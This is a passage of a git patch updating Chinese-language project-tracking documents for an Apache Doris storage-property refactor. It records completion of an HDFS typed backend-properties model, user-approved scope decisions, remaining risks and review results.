**R-007(已触发,用户接受)**:HDFS-warehouse paimon BE 配置丢(fe-filesystem 无 HDFS typed BE model)→ HDFS(尤 HA/kerberized)原生读回归。**follow-up FU-T01** 补 fe-filesystem `HdfsFileSystemProperties`(超白名单)。docker P1-T06 HDFS flavor 会暴露——**已知、非新 bug**。 -- ❗ **R-008(已触发,用户接受类)**:fe-filesystem typed OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`(无凭据 catalog 的 legacy `ANONYMOUS` 丢)→ 带 IAM-role 云主机误取 instance 凭据(公开桶仍 anonymous 非硬失败)。**follow-up FU-T02**(超白名单)。仅影响无 ak/sk 的 OSS/COS/OBS。 -- ❗ **R-006(confirm,需用户定夺)**:fe-filesystem 对调优默认值(S3 50/3000/1000、OSS/COS/OBS 100/10000/10000)**无显式 UT 守护**。**功能今日正确**,docker P1-T06 兜底。修法(超 P1 白名单)=在 `S3/Oss/Cos/ObsFileSystemPropertiesTest` 加 test-only 断言,作 follow-up。 -- 📌 **R-006/R-007/R-008 + FU-T01/FU-T02 同源**:均「fe-filesystem typed storage 模型对 legacy 不完整(BE model 缺 HDFS、缺 OSS/COS/OBS provider-type、缺调优默认断言),fix 全在 fe-filesystem(超 P1 白名单)」→ 宜与 fe-filesystem 收口/迁移批次或经用户批准的小补丁同做。**下次 session 可向用户确认是否纳入。** +- ✅ 已闭环:R-007(FU-T01)。 +- ❗ **R-008(已触发,用户接受类)**:fe-filesystem typed OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE`(无凭据 catalog 的 legacy `ANONYMOUS` 丢)。**follow-up FU-T02**(超白名单——`fe-filesystem-{oss,cos,obs}`)。 +- ❗ **R-006(confirm,需用户定夺)**:fe-filesystem 调优默认值无显式 UT 守护;docker P1-T06 兜底;fe-filesystem 加断言 follow-up(超白名单)。 +- 📌 **残留已知(非 FU-T01 引入,独立 FU)**:**oss-hdfs**(`oss://` warehouse + JindoFS)在 typed 路缺 oss 凭据键——P1-T04 已起(HDFS-family typed 缺口),彻底修需 fe-filesystem **OssHdfs typed model**(独立大动作,超白名单)。FU-T01 让 HDFS provider 对 bare-`oss://` fs.defaultFS 发无凭据 HDFS 键(review F3 MINOR,latent 误配曝露,非 working catalog 回归)。 +- 📌 **scan-time 重 validate**:`getStorageProperties()` 每次 scan 经 `bindAll`→`bind()`→`of().validate()`(无 memoization)——valid catalog 内禀 dormant;是 typed-路通性(P1-T02/D-009),非 FU-T01 专有。 - ⚠️ e2e 全程未跑;P1-T06 前如不部署 docker,明确标「未跑 e2e」(CLAUDE.md Rule 12)。 ## 红线提醒(WORKFLOW §4) -- **可动**(白名单):`fe-connector-paimon/**`(P1-T04+ 改造)、`fe-connector-spi/**`(勿再扩)、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法**)、相关 pom(仅依赖增删)、本跟踪目录。 -- **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、**fe-filesystem 各模块**(含其 test——R-006 的 fe-filesystem 断言须经用户批准才动)、`fe-property` 模块删除。 -- paimon 连接器现**允许** import `org.apache.doris.filesystem.properties.*`(fe-filesystem-api,目标边);**禁** `org.apache.doris.{property,catalog,common,datasource,qe,...}`(import-gate 守)。 +- **可动**(白名单):`fe-connector-paimon/**`、`fe-connector-spi/**`、fe-core **仅** `connector/DefaultConnectorContext.java` + `fs/FileSystemPluginManager.java` + `fs/FileSystemFactory.java`(均**仅新增方法 / 对本项目所加方法的微改+注释**)、**`fe-filesystem/fe-filesystem-hdfs/**`(D-010 授权,仅 FU-T01)**、相关 pom、本跟踪目录。 +- **禁碰**:fe-core `datasource.property.{storage,metastore}` 包、构造点 `PluginDrivenExternalCatalog`、其它连接器(hive/hudi/iceberg/es/jdbc/mc/trino)、**其它 fe-filesystem 模块**(`-{api,spi,s3,oss,cos,obs,azure,broker,local}`,含其 test)、`fe-property` 模块删除。 +- **FU-T01 额外触碰**(已记 D-010 + tasks,透明):fe-core `FileSystemFactory.java`(F1 +1 行 setProperty,项目 P1-T02 加的方法)、`FileSystemPluginManager.java`(bindAll javadoc,项目 P0-T02 加的方法)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释)——均 project-owned 微改/注释,非碰 pre-existing fe-core 方法。 +- paimon 连接器 + fe-filesystem-hdfs **允许** import `org.apache.doris.foundation.*`(fe-foundation 叶子)、`org.apache.doris.filesystem.*`;**禁** import fe-core/fe-connector(fe-filesystem 侧 gate)。 - 每次提交前 `git diff --name-only` 对照白名单。 ## 关键链接 - 设计:[`../designs/metastore-storage-property-refactor-design-2026-06-17.md`](../designs/metastore-storage-property-refactor-design-2026-06-17.md) - 流程:[`WORKFLOW.md`](./WORKFLOW.md) | 任务:[`tasks.md`](./tasks.md) | 决策:[`decisions-log.md`](./decisions-log.md) | 偏差:[`deviations-log.md`](./deviations-log.md) | 风险:[`risks.md`](./risks.md) -- 对抗 review(P1-T04):workflow `wf_09745716-d48`(10 agent,confirm R-008 + 3 test-gap;transcript 在 session subagents 目录)|P1-T03:`wf_76df09a4-c2f` +- 对抗 review(FU-T01):workflow `wf_5db99e32-2ad`(27 agent,4 lens + verify;3 实质修 + F1 接线)|recon:`wf_de5f54be-668`(4-agent:legacy parity / fe-filesystem-hdfs / api+s3 / kerberos) diff --git a/plan-doc/metastore-storage-refactor/PROGRESS.md b/plan-doc/metastore-storage-refactor/PROGRESS.md index 7b081482b568eb..b6cadb43193684 100644 --- a/plan-doc/metastore-storage-refactor/PROGRESS.md +++ b/plan-doc/metastore-storage-refactor/PROGRESS.md @@ -17,7 +17,8 @@ --- ## 当前活跃 task -- **下一个:`P1-T06`**(P1 验证收口):paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS;**真 T1 等价闸 Option C**。**若不部署 docker → 明确标「未跑 e2e」**(CLAUDE.md Rule 12)。 +- **FU-T01 ✅ 完成(2026-06-17,D-010 授权,commit 待提交)**:给 `fe-filesystem-hdfs` 新建 HDFS typed BE model(`HdfsFileSystemProperties` + `HdfsConfigFileLoader` + provider bind),修复 P1-T04 的 HDFS BE 回归(DV-004/**R-007 闭环**)。移植源 = fe-property `HdfsProperties`(parity by construction);kerberos=K1(BE-key 字符串、不建 fe-kerberos);BE-only(不实现 HadoopStorageProperties)。验证:fe-filesystem-hdfs 全模块 **78/0**(含 25 golden parity;既有 create() 路零回归)+ checkstyle 0 + RED/GREEN(mutation) + fe-core 编译绿。**对抗 review `wf_5db99e32-2ad`(27 agent)**清场,3 实质修(malformed-uri fail-loud + 2 stale 注释 + 11 测试)+ **F1 接线**(config-dir sysprop 桥 `Config.hadoop_config_dir`,用户选「现在接好」)。⚠️ docker e2e 未跑。 +- **下一个:`P1-T06`**(P1 验证收口):paimon UT 全绿(已 293/0/1skip)+ docker `enablePaimonTest=true` 5 flavor(filesystem/hms/rest/jdbc/dlf)+ vended(REST/DLF) + Kerberos HMS;**真 T1 等价闸 Option C**;**FU-T01 已补 → HDFS flavor 应通过(R-007 已闭环)**。**若不部署 docker → 明确标「未跑 e2e」**(CLAUDE.md Rule 12)。 - P0-T01 ✅|P0-T02 ✅(bindAll)|P1-T01 ✅(getStorageProperties 默认方法 + 边)|P1-T02 ✅(getStorageProperties 实现 + FileSystemFactory accessor)|P1-T03 ✅(paimon storage 配置 `applyStorageConfig` 改走 `toHadoopConfigurationMap()`)|P1-T04 ✅(paimon BE 静态凭据改走 `getStorageProperties().toBackendProperties().toMap()`,全量切)|**P1-T05 ✅**(删 paimon→fe-property pom 依赖边 + grep 归零闸)。 - ✅ **连接器 storage + BE 凭据路全切 fe-filesystem-api typed,且 paimon→fe-property 依赖边已断**:catalog 路 `PaimonConnector.buildStorageHadoopConfig()→toHadoopConfigurationMap()`;BE 扫描分片路 `PaimonScanPlanProvider` 遍历 `getStorageProperties()→toBackendProperties().toMap()`→`location.*`(vended overlays static 保序不动)。paimon 已零 `org.apache.doris.property/datasource` import + pom 无 fe-property 依赖(fe-property 变 0 消费者孤儿,本次不物理删 D-005)。 - ⚠️ **已知接受回归(fe-filesystem typed BE model 不全,超 P1 白名单)**:HDFS-warehouse paimon BE 配置丢(DV-004/R-007/FU-T01);无凭据 OSS/COS/OBS 缺 `AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS`(R-008/FU-T02)。均用户接受、follow-up 修、docker P1-T06 会暴露(非新 bug)。 @@ -31,6 +32,7 @@ --- ## 最近动态(最近 7 天) +- 2026-06-17 **FU-T01 ✅**(D-010 授权,HDFS typed BE model 修 DV-004/R-007):新建 `fe-filesystem-hdfs` 的 `HdfsFileSystemProperties`(BE-only,忠实移植 legacy `initBackendConfigProperties`)+ `HdfsConfigFileLoader`(XML 资源)+ provider `bind()`/`create(P)`(`create(Map)`/`supports()` 不动)+ pom `fe-foundation`/`commons-lang3`。kerberos=**K1**(BE-key 字符串内联,不建 fe-kerberos,不碰 create()-side authenticator;用户 AskUserQuestion 选)。**真 parity 在 UT 落地**(非 paimon Option C):25 golden parity 钉 `toMap()`==legacy BE 键集(simple/kerberos/HA/username/uri-derive/XML/sysprop…)。验证 fe-filesystem-hdfs **78/0** + checkstyle 0 + RED/GREEN(mutation 关 kerberos 块→红) + fe-core `-am compile` 绿 + `git diff` 白名单干净。**对抗 review `wf_5db99e32-2ad`(27 agent,4 lens+verify)**:清场(packaging 无跨 loader、parity byte-level 复核、BE-only 无新 catalog 路回归、强 oss-hdfs 断言被 verify 推翻),3 实质修(①malformed-uri swallow→fail-loud 对齐 legacy;②2 处 stale 注释[bindAll javadoc/paimon KNOWN GAP 1];③+11 测试)。**F1**(XML config-dir 未接 `Config.hadoop_config_dir`)用户选「**现在接好**」=fe-core `FileSystemFactory` setProperty 桥(leaf 读 sysprop)。**额外触碰 3 已白名单文件**(FileSystemFactory/FileSystemPluginManager/PaimonScanPlanProvider,均 project-owned 微改/注释)。残留 oss-hdfs JindoFS 凭据=独立 FU。⚠️ docker e2e 未跑(HA/kerberized 真闸 P1-T06)。 - 2026-06-17 **P1-T05 ✅**(断开 paimon→fe-property 依赖边):删 `fe-connector-paimon/pom.xml` 的 `fe-property` 依赖块(仅删 pom 边——import/call 已在 P1-T03 清 DV-003-b)。recon 确认 paimon src(main+test)`org.apache.doris.property` 已 ZERO、唯一物理耦合是 pom :72,其余 `fe-property` 字样皆历史注释(不动)。**RED/GREEN=构建闸**(无 UT 可写):删后全模块编译+全 UT 仍绿=证无隐藏 transitive 断裂。验证:paimon 全模块 **293/0/0/1skip**、grep 归零、pom 无 fe-property、checkstyle 0、import-gate PASS、白名单干净(仅 pom)。**fe-property 变 0 消费者孤儿(本次不物理删,D-005)**。⚠️ docker e2e 未跑。仅剩 P1-T06 验证即 P1 收口。 - 2026-06-17 **P1-T04 ✅**(paimon `PaimonScanPlanProvider` BE 静态凭据全量切 `getStorageProperties().toBackendProperties().ifPresent(putAll(toMap()))`→`location.*`;vended 不动、叠后保序):现场 recon 揪出 **DV-002 未覆盖的 HDFS 缺口**——fe-filesystem 无 HDFS typed BE model(`HdfsFileSystemProvider.bind` 抛→`bindAll` 跳过),legacy `getBackendStorageProperties()` 经 fe-core 发的 HDFS `hadoop/dfs/HA/kerberos`→`THdfsParams` 是 load-bearing,全量切会丢→HDFS paimon 原生读回归;`getBackendStorageProperties()` 是 ConnectorContext 方法不依赖 fe-property→P1-T05 不需此切换,纯 D-003 统一。**用户定全量切 + 接受 HDFS 回归 + follow-up 补 HDFS typed BE 类**(DV-004/R-007/FU-T01)。TDD RED(`expected ak was null`)→GREEN;52/0 + 全模块 292/0/1skip + checkstyle 0 + import-gate PASS + 白名单干净(2 文件)。**对抗 review `wf_09745716-d48`**(10 agent)confirm 4:MAJOR=R-008(OSS/COS/OBS typed 缺 `AWS_CREDENTIALS_PROVIDER_TYPE` ANONYMOUS,fe-filesystem 超白名单→FU-T02,仅无凭据 catalog)+ 3 test-gap 已修(新增 Optional.empty 跳过 + 多 entry merge 测试);推翻 3 假 finding(含实测 mutation 证「测试钉了新 seam」)。⚠️ docker e2e 未跑。 - 2026-06-17 **P1-T03 ✅**(commit `[P1-T03]`;连接器侧首个 task;paimon `applyStorageConfig` 改走 `ctx.getStorageProperties().toHadoopConfigurationMap()`):recon 证 ctx 在 `PaimonConnector.createCatalog()` 可达 → `buildStorageHadoopConfig()` 合并下发;保留 paimon.*/raw 覆盖 last-write-wins。**T1 = Option C**(用户选;fe-filesystem 对象存储 impl 是运行时插件不在单测 classpath → paimon UT 只钉 connector-local 契约,真等价由 docker P1-T06 兜底;DV-003)。TDD RED(neuter forEach → 3 测红)→GREEN;删 ~23 canonical 测试(fe-filesystem 职责)+ 6 新契约测试;**292/0/0/1skip + checkstyle 0 + import-gate PASS + 白名单干净**。**对抗 review `wf_76df09a4-c2f`** 推翻假 1B+2M、confirm 1M=**R-006**(调优默认 50/3000/1000、100/10000/10000 fe-filesystem 无显式 UT 守护;功能正确,docker 兜底,fe-filesystem 加断言 follow-up 超白名单)。⚠️ docker e2e 未跑。 diff --git a/plan-doc/metastore-storage-refactor/WORKFLOW.md b/plan-doc/metastore-storage-refactor/WORKFLOW.md index b7f342e0fc331b..1482fecc0b0c98 100644 --- a/plan-doc/metastore-storage-refactor/WORKFLOW.md +++ b/plan-doc/metastore-storage-refactor/WORKFLOW.md @@ -57,6 +57,7 @@ fe/fe-connector/fe-connector-spi/** (仅 ConnectorContext 新 fe/fe-core/src/main/java/.../connector/DefaultConnectorContext.java (仅新增 getStorageProperties) fe/fe-core/src/main/java/.../fs/FileSystemPluginManager.java (仅新增 bindAll;D-009/DV-001) fe/fe-core/src/main/java/.../fs/FileSystemFactory.java (仅新增 bindAllStorageProperties;D-009 二次确认) +fe/fe-filesystem/fe-filesystem-hdfs/** (FU-T01:HDFS typed BE model;D-010 授权局部解禁;其它 fe-filesystem 模块仍禁碰) fe/fe-connector/pom.xml ; fe/pom.xml (仅新增模块声明) plan-doc/metastore-storage-refactor/** (本跟踪目录) ``` diff --git a/plan-doc/metastore-storage-refactor/decisions-log.md b/plan-doc/metastore-storage-refactor/decisions-log.md index eb761a97ed4799..f3a3e17d16f716 100644 --- a/plan-doc/metastore-storage-refactor/decisions-log.md +++ b/plan-doc/metastore-storage-refactor/decisions-log.md @@ -5,6 +5,18 @@ --- +## D-010 — 授权触碰 fe-filesystem-hdfs(FU-T01 HDFS typed BE model)+ kerberos 选 K1(不建 fe-kerberos) +- **日期**:2026-06-17 | **决策者**:用户(确认设计 + AskUserQuestion 选 K1) +- **内容**:授权本次**局部解禁** `fe-filesystem-hdfs`(原 D-005 / WORKFLOW §4.1 禁碰 fe-filesystem),把 **FU-T01 从 follow-up 提升为 active 任务**,修复 P1-T04 引入的 HDFS BE 配置回归(DV-004 / R-007)。范围: + 1. 新建 `fe-filesystem-hdfs` 的 **`HdfsFileSystemProperties`**(`implements FileSystemProperties, BackendStorageProperties`,**不**实现 `HadoopStorageProperties`——BE-only,catalog/Hadoop 路保持现状即 P1-T03 后的 raw passthrough,零新行为)+ 小工具 **`HdfsConfigFileLoader`**(XML `hadoop.config.resources` 加载,移植 fe-property `PropertyConfigLoader`,使叶子不依赖 fe-common/fe-core)。 + 2. 改 `HdfsFileSystemProvider`:re-type 为 `FileSystemProvider` + 新增 `bind()`/`create(P)`;**`create(Map)` 与 `supports()` 保持字节级不变**(hive/iceberg/broker 的 FE filesystem 路零回归)。 + 3. `fe-filesystem-hdfs/pom.xml` 增 `fe-foundation` + `commons-lang3`(镜像 sibling `fe-filesystem-s3`)。 + - **toMap()(BE map)= 忠实移植 legacy `HdfsProperties.initBackendConfigProperties()`** → 与 fe-core `getBackendConfigProperties()` parity(含 XML 资源、`hadoop./dfs./fs./juicefs.` 透传、恒发 `ipc.client.fallback...`+`hdfs.security.authentication`、kerberos 块、`hadoop.username`、HA 校验、kerberos required-check)。源 = fe-property `HdfsProperties`(依赖轻、BE-key-only、无 authenticator 的孪生)。 + - **kerberos = K1**(用户 AskUserQuestion 选):BE-key 字符串内联发射(`hadoop.security.authentication=kerberos`/principal/keytab),**不新建 fe-kerberos**、**不碰** fe-filesystem-hdfs 现有 create()-side `KerberosHadoopAuthenticator`。recon 证 BE model 仅需字符串发射、不需 fe-kerberos(真正 `UGI.doAs` 仍留 fe-core/ctx + 现有 DFSFileSystem,§5 不变量 4)。fe-kerberos/P3a/P3b 仍为独立未来工作。 +- **理由**:R-007/DV-004 闭环物理上须给 typed 路一个 HDFS BE model(否则 `getStorageProperties()` 对 HDFS catalog 返回空)。recon(`wf_de5f54be-668` 4-agent)证:①fe-property `HdfsProperties` 是现成的依赖轻 BE-key-only 移植源(parity by construction);②`BackendStorageKind.HDFS`/`FileSystemType.HDFS`/`StorageKind.HDFS_COMPATIBLE` 已存在;③`bindAll` 只 catch UOE → 校验错误正常上抛非吞掉;④BE model 的 kerberos 仅字符串、不需 fe-kerberos(K1)。BE-only + create(Map) 不动 = 最外科、对 catalog 路零新行为。**真 parity 可在 UT 落地**(不同于 paimon Option C):fe-filesystem-hdfs 自有模块,可写 golden parity UT 钉 `toMap()` == legacy BE 键集。 +- **影响**:WORKFLOW §4.1 白名单 +`fe/fe-filesystem/fe-filesystem-hdfs/**`(仅本任务;其它 fe-filesystem 模块仍禁碰);R-007 状态「已触发(接受)」→「修复中」→**「已闭环」**;tasks FU-T01 ⬜(follow-up)→🚧→✅(active);R-005/P3a/P3b 不受影响(K1 不碰 kerberos 收口);R-008(OSS/COS/OBS ANONYMOUS)仍 FU-T02 独立。**被否**:K2(建 fe-kerberos 仅放常量=低值)、K3(连 create()-side doAs 一并收口=P3b scope,触碰工作中的 create() 路、回归面大,宜独立任务)。 +- **对抗 review 增补(`wf_5db99e32-2ad`,27 agent,4 lens + verify;2026-06-17)**:~13 confirm(多 NIT/MINOR + 清场),3 实质修:①malformed-`uri` 由 swallow 改 **fail-loud**(对齐 legacy `extractDefaultFsFromUri` 不 try/catch);②两处被本改动作废的 stale 注释(`FileSystemPluginManager.bindAll` javadoc 去 HDFS、paimon `KNOWN GAP 1` 标 CLOSED);③+11 覆盖测试(empty-input fallback、kerberos-creds-but-simple 判别、viewfs/jfs derive vs ofs/oss no-derive、allowFallback-blank、multi-uri、HA 三分支、malformed-uri、sysprop 解析)。**F1(用户选「现在接好」)= XML config-dir 接线**:legacy 走 `Config.hadoop_config_dir`(可被 operator 覆盖),新 leaf 不能 import fe-core `Config`→在 **`FileSystemFactory.bindAllStorageProperties`(已白名单)** `System.setProperty("doris.hadoop.config.dir", Config.hadoop_config_dir)`,`HdfsConfigFileLoader.resolveHadoopConfigDir()` 读该 sysprop(默认 dir 与 Config 默认相同,仅非默认安装受影响)。**额外触碰**(均 project-owned 方法体微改 + 注释,已在 commit/HANDOFF 标注):fe-core `FileSystemFactory.java`(+1 行 setProperty,本项目 P1-T02 加的方法)、`FileSystemPluginManager.java`(bindAll javadoc,本项目 P0-T02 加的方法)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释)。**清场(非缺陷)**:packaging 无跨 loader 风险(无 fe-foundation 类穿越边界、hadoop parent-first)、`new Configuration()` 默认 bloat 是 legacy-faithful、BE-only 不引入新 catalog 路回归、独立 agent 逐键复核 byte-level parity。**残留已知(非本任务)**:oss-hdfs 在 typed 路仍缺 JindoFS oss 凭据(P1-T04 已起、需 fe-filesystem OssHdfs typed model,独立 FU);scan-time 重 validate(valid catalog 内禀 dormant,bindAll 无 memoization 是 typed-路通性非 FU-T01)。 + ## D-009 — bind-all 机制 + 白名单 +1(FileSystemPluginManager)(应对 DV-001) - **日期**:2026-06-17 | **决策者**:用户(应对 P0-T01 证伪 P0-1 预期) - **内容**:实现 `ConnectorContext.getStorageProperties()`(返回 fe-filesystem typed `StorageProperties`)所需的 raw map → `List` 绑定,落在 fe-core `FileSystemPluginManager` 新增 additive `public List bindAll(Map)`(镜像现有 `createFileSystem` 的 provider 循环,但用 `provider.bind(props)` 全量收集所有 `supports()` 命中者,而非首个命中 `create`)。`DefaultConnectorContext.getStorageProperties()` 调它;raw map 经现有 `storagePropertiesSupplier` 值的 `getOrigProps()` 取(fe-core `ConnectionProperties` 公有 getter),**不改构造点**(`PluginDrivenExternalCatalog` 零改动)。 diff --git a/plan-doc/metastore-storage-refactor/risks.md b/plan-doc/metastore-storage-refactor/risks.md index af869ffcf2d737..9d8b8cb3cc9126 100644 --- a/plan-doc/metastore-storage-refactor/risks.md +++ b/plan-doc/metastore-storage-refactor/risks.md @@ -17,7 +17,7 @@ - **缓解**:**docker P1-T06** 为运行期兜底;**建议 follow-up**(**超出当前 P1 白名单——fe-filesystem 禁碰**):在 `S3FileSystemPropertiesTest` + `Oss/Cos/ObsFileSystemPropertiesTest` 加调优默认断言(test-only additive)。在 fe-filesystem 收口/迁移批次或经用户批准的小补丁中做。**不在 paimon 重复断言**(Option C:paimon 无 fe-filesystem impl 于测试 classpath,合成 map 断言为同义反复,不守 fe-filesystem 默认)。 - **触发判据**:fe-filesystem 调优默认被改且 docker P1-T06 未跑 → 静默 mis-tune。 -## R-007 — HDFS-warehouse paimon BE 配置回归(typed BE 路无 HDFS model)| 状态:已触发(用户接受,待 follow-up FU-T01 修) +## R-007 — HDFS-warehouse paimon BE 配置回归(typed BE 路无 HDFS model)| 状态:已闭环(2026-06-17 FU-T01 完成 — `HdfsFileSystemProperties` typed BE model + provider bind;UT golden parity 25/0,对抗 review `wf_5db99e32-2ad` 清场;⚠️ docker HA/kerberized 真闸在 P1-T06) - **描述(P1-T04,DV-004)**:BE 静态凭据全量切到 `getStorageProperties()→toBackendProperties().toMap()`。fe-filesystem **无 HDFS typed BE model**(`HdfsFileSystemProvider` 未 override `bind()`→默认抛 `UnsupportedOperationException`→`bindAll` 跳过)→ HDFS-warehouse paimon catalog 的 `getStorageProperties()` 返回空 → BE 扫描分片**不再带** `hadoop.*/dfs.*/HA/kerberos` 键(legacy 经 `getBackendStorageProperties`→`THdfsParams` 发)。 - **影响**:HDFS(尤其 **HA / kerberized**)上的 paimon **原生读失败**(解析不了 nameservice / 无鉴权);**对象存储 flavor 不受影响**(typed 路 AWS_* 等价/超集)。 - **缓解**:**follow-up FU-T01**——给 `fe-filesystem-hdfs` 新建 `HdfsFileSystemProperties`(`implements BackendStorageProperties`,override `FileSystemProvider.bind`)让 `bindAll` 收集 HDFS 项、`toBackendProperties()` 产 BE 键。**过渡期 HDFS-warehouse paimon 为已知回归**(用户 2026-06-17 明确接受)。 diff --git a/plan-doc/metastore-storage-refactor/tasks.md b/plan-doc/metastore-storage-refactor/tasks.md index 5c7dee6d864a29..42ebd39921c788 100644 --- a/plan-doc/metastore-storage-refactor/tasks.md +++ b/plan-doc/metastore-storage-refactor/tasks.md @@ -127,10 +127,13 @@ ## Follow-ups(范围外占位,本次不做) -### FU-T01 ⬜(follow-up,本次不做)给 fe-filesystem 新建 HDFS typed BE model(修 DV-004 / R-007) -- **做什么**:在 `fe-filesystem-hdfs` 新建 `HdfsFileSystemProperties`(`implements FileSystemProperties, BackendStorageProperties`,承载 `hadoop.*/dfs.*/HA/kerberos` 的 BE 键),并让 `HdfsFileSystemProvider` override `FileSystemProvider.bind()` 返回它(取代当前默认抛 `UnsupportedOperationException`)。这样 `FileSystemPluginManager.bindAll` 会收集 HDFS 项、`getStorageProperties().toBackendProperties().toMap()` 对 HDFS-warehouse paimon catalog 重新产出 BE 键 → 修复 P1-T04 的 HDFS BE 回归(DV-004 / R-007)。 -- **验收**:HDFS-warehouse paimon docker flavor(含 HA / kerberized HMS+HDFS)原生读恢复;fe-filesystem `HdfsFileSystemProperties` BE 键集与 legacy fe-core `HdfsProperties.getBackendConfigProperties` 等价(HA/kerberos 含齐);对象存储 flavor 零回归。 -- **依赖**:P1-T04(暴露缺口)。**范围外**:动 `fe-filesystem-hdfs`(超 P1 白名单——fe-filesystem 禁碰),须经用户批准/扩范围,宜与 D-007 fe-kerberos 收口(P3b)或 fe-filesystem 迁移批次同做。 +### FU-T01 ✅(2026-06-17 完成;active — 用户提升 + D-010 授权)给 fe-filesystem-hdfs 新建 HDFS typed BE model(修 DV-004 / R-007) +- **做什么**:在 `fe-filesystem-hdfs` 新建 `HdfsFileSystemProperties`(`implements FileSystemProperties, BackendStorageProperties`,**不**实现 `HadoopStorageProperties`——BE-only)承载 `hadoop.*/dfs.*/HA/kerberos` 的 BE 键 + 小工具 `HdfsConfigFileLoader`(XML `hadoop.config.resources` 加载,移植 fe-property `PropertyConfigLoader`);`HdfsFileSystemProvider` re-type 为 `FileSystemProvider` + 新增 `bind()`/`create(P)`(**`create(Map)`/`supports()` 不动**)。`pom` 增 `fe-foundation`+`commons-lang3`。这样 `FileSystemPluginManager.bindAll` 收集 HDFS 项、`getStorageProperties().toBackendProperties().toMap()` 对 HDFS-warehouse paimon catalog 重新产 BE 键 → 修复 P1-T04 的 HDFS BE 回归(DV-004 / R-007)。**kerberos = K1**(D-010;BE-key 字符串内联,不建 fe-kerberos,不碰 create()-side authenticator)。 +- **做法(移植源 = fe-property `HdfsProperties`,依赖轻 BE-key-only 孪生,parity by construction)**:`toMap()` 忠实移植 legacy `initBackendConfigProperties()`(XML 资源 + `hadoop./dfs./fs./juicefs.` 透传 + 恒发 `ipc.client.fallback...`/`hdfs.security.authentication` + kerberos 块 + `hadoop.username`);`validate()` = kerberos required-check(principal+keytab)+ `checkHaConfig`(移植 `HdfsPropertiesUtils`,inline 私有方法)。`backendKind()=HDFS`、`type()=HDFS`、`kind()=HDFS_COMPATIBLE`、`providerName()="HDFS"`。 +- **TDD**:golden parity UT `HdfsFileSystemPropertiesTest` 钉 `of(input).toMap()` == legacy BE 键集(simple / kerberos / HA-multi-nn + 负例 / hadoop.username / fs.defaultFS-from-uri / XML-resources)——**真 parity 闸在 UT**(fe-filesystem-hdfs 自有模块,非 paimon Option C)。 +- **验收**:UT golden parity 全绿;checkstyle 0;`git diff` 仅落 `fe-filesystem-hdfs/**`;`create(Map)`/`supports()` 字节不变;docker(含 HA/kerberized)HDFS-warehouse paimon 原生读恢复(docker 未跑则标注)。 +- **依赖**:P1-T04(暴露缺口)。**D-010 授权**触碰 `fe-filesystem-hdfs`。**红线**:核心改 `fe-filesystem-hdfs/**`;F1 接线 + stale-注释 另碰 3 个已白名单文件(均 project-owned 方法体微改/注释):fe-core `FileSystemFactory.java`(+1 行 setProperty)、`FileSystemPluginManager.java`(bindAll javadoc)、fe-connector-paimon `PaimonScanPlanProvider.java`(注释);其它 fe-filesystem 模块仍禁碰。 +- **完成态(2026-06-17,commit 待提交)**:新建 `HdfsFileSystemProperties`(`FileSystemProperties + BackendStorageProperties`,BE-only)+ `HdfsConfigFileLoader`(XML 资源,sysprop 接 `Config.hadoop_config_dir`);`HdfsFileSystemProvider` re-type + `bind()`/`create(P)`(`create(Map)`/`supports()` 不动);pom +`fe-foundation`+`commons-lang3`。**移植源 = fe-property `HdfsProperties`,parity by construction**。验证:fe-filesystem-hdfs 全模块 **78/0/0**(含新增 25 golden parity;既有 25 `DFSFileSystemTest` 等绿=create() 路零回归)、checkstyle 0、RED/GREEN 经 mutation 证、fe-core `-pl fe-core -am compile` 绿(验 FileSystemFactory/PluginManager 改)、`git diff` 白名单干净。**对抗 review `wf_5db99e32-2ad`(27 agent,4 lens+verify)**:清场 packaging/parity/scope,3 实质修(malformed-uri fail-loud + 2 stale 注释 + 11 测试),**F1 用户选「现在接好」**(config-dir sysprop 桥)。残留 oss-hdfs JindoFS 凭据=独立 FU(P1-T04 已起)。⚠️ **docker e2e 未跑**(HA/kerberized HDFS-warehouse 真闸在 P1-T06)。 ### FU-T02 ⬜(follow-up,本次不做)给 fe-filesystem OSS/COS/OBS 补 AWS_CREDENTIALS_PROVIDER_TYPE(修 R-008) - **做什么**:给 `Oss/Cos/ObsFileSystemProperties` 加 `credentialsProviderType` 字段 + 在 `toBackendKv()` 发 `AWS_CREDENTIALS_PROVIDER_TYPE`,**精确镜像 legacy**(ak/sk 皆空 → `ANONYMOUS`,否则**省略**——legacy OSS/COS/OBS 仅 blank-creds 才发,非无条件)。 From d9bedba38aa586536c7e3c3df7a4ef4eaccaeca7 Mon Sep 17 00:00:00 2001 From: morningman Date: Thu, 18 Jun 2026 04:11:26 +0800 Subject: [PATCH 085/128] =?UTF-8?q?docs(storage-refactor):=20D-011=20?= =?UTF-8?q?=E2=80=94=20do=20R-008=20(FU-T02)=20+=20R-006=20(FU-T03)=20befo?= =?UTF-8?q?re=20P1-T06?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit User reprioritized: handle the two known fe-filesystem object-store gaps before the P1-T06 docker run so it becomes a clean all-green acceptance. FU-T02 = OSS/COS/OBS AWS_CREDENTIALS_PROVIDER_TYPE=ANONYMOUS parity; FU-T03 = S3/OSS/COS/OBS tuning-default UT assertions. Records D-011, expands whitelist to fe-filesystem-{s3,oss,cos,obs}, promotes both tasks, reorders P1-T06 after them. No code yet. Co-Authored-By: Claude Opus 4.8 (1M context) --- .../metastore-storage-refactor/HANDOFF.md | 31 ++++++++++++------- .../metastore-storage-refactor/PROGRESS.md | 6 +++- .../metastore-storage-refactor/WORKFLOW.md | 3 +- .../decisions-log.md | 9 ++++++ plan-doc/metastore-storage-refactor/risks.md | 4 +-- plan-doc/metastore-storage-refactor/tasks.md | 15 ++++++--- 6 files changed, 49 insertions(+), 19 deletions(-) diff --git a/plan-doc/metastore-storage-refactor/HANDOFF.md b/plan-doc/metastore-storage-refactor/HANDOFF.md index 